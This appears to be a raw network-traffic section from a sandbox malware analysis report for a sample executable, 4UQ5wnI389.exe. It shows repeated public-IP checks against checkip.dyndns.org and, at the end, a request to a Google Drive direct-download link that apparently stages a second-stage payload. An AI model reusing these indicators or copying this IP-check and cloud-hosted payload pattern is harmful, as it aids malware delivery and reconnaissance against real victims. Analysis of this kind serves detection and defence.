                                                                                                          Jan 10, 2025 21:25:45.259149075 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:45 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 387a7da67e69661bc8f25350dde6d0c7
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.849813158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:46.181885958 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:46.752300978 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 9adb4e4b5af887848980fd5e2b84b0ea
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.849820158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:48.486207962 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:49.051666975 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:48 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 9d9fc2155423770f244531d28b722d50
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.849832158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:49.996225119 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:50.579760075 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:50 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 63444682730d1d9aaa69528f682706b9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.849844158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:51.453834057 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:54.057730913 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:53 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 3f1d99cca4ac8753a61d9a9e83102b9a
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.849869158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:54.961532116 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:58.523112059 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Fri, 10 Jan 2025 20:25:58 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          X-Request-ID: 6f0e47e30481533038e17ebc52a3177f
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.849892158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:58.814627886 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:01.638802052 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:01 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a615f72ec398d471f646015a64c70bfe
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.849919158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:02.464571953 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:05.312028885 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:05 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: c3287b6759b20457efc8931bcdf12fca
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.849945158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:06.190325022 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:09.752568007 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Fri, 10 Jan 2025 20:26:09 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          X-Request-ID: 60b759db4891341d3a2b6de4908515fc
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.849967158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:09.762434959 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:11.476747036 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 8a757c8304009d81daa1a2bbe6c167bd
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.849988158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:12.412791967 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:13.006381035 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:12 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 19b043f583d3670d591837ce9174b7ca
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.849998158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:13.832356930 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:15.409513950 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 2cd87a99d11a960f37cd73f4287b9c8a
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.850007158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:16.235554934 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:16.846008062 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:16 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 2fbd4295da2612d380b7e51c1912ac32
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.850009158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:17.768923044 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:21.397540092 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Fri, 10 Jan 2025 20:26:21 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          X-Request-ID: d5806db03c4f8b56cfa915de52269d06
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                          Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.850010158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:26:21.411242008 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:26:22.824995995 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:26:22 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 4b64fcdebee4c96a94279eca0cbe5ae9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.849708142.250.186.784435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:12 UTC216OUTGET /uc?export=download&id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-10 20:25:12 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 10 Jan 2025 20:25:12 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-u8BHxJNTz9ai0rxayWzFxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.849710216.58.206.334435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
